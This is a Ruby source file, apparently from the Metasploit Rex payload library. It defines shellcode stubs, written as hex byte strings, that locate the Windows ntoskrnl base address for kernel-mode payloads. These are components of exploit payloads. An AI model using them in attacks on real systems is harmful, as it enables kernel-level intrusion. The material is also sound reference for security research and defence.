Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# -*- coding: binary -*-
2
module Rex
3
module Payloads
4
module Win32
5
module Kernel
6

7

8
#
9
# This class provides common methods that may be shared across more than
10
# one kernel-mode payload.  Many of these are from the following paper:
11
#
12
# http://www.uninformed.org/?v=3&a=4&t=sumry
13
#
14
module Common
15

16
  #
17
  # Returns a stub that will find the base address of ntoskrnl and
18
  # place it in eax.  This method works by using an IDT entry.  Credit
19
  # to eEye.
20
  #
21
  def self.find_nt_idt_eeye
22
    "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
23
  end
24

25
  #
26
  # Returns a stub that will find the base address of ntoskrnl and
27
  # place it in eax.  This method uses a pointer found in KdVersionBlock.
28
  #
29
  def self.find_nt_kdversionblock
30
    "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
31
  end
32

33
  #
34
  # Returns a stub that will find the base address of ntoskrnl and
35
  # place it in eax.  This method uses a pointer found in the
36
  # processor control region as a starting point.
37
  #
38
  def self.find_nt_pcr
39
    "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
40
  end
41

42
  #
43
  # Alias for resolving symbols.
44
  #
45
  def self.resolve_call_sym
46
    Rex::Payloads::Win32::Common.resolve_call_sym
47
  end
48

49
end
50

51
end
52
end
53
end
54
end
55

56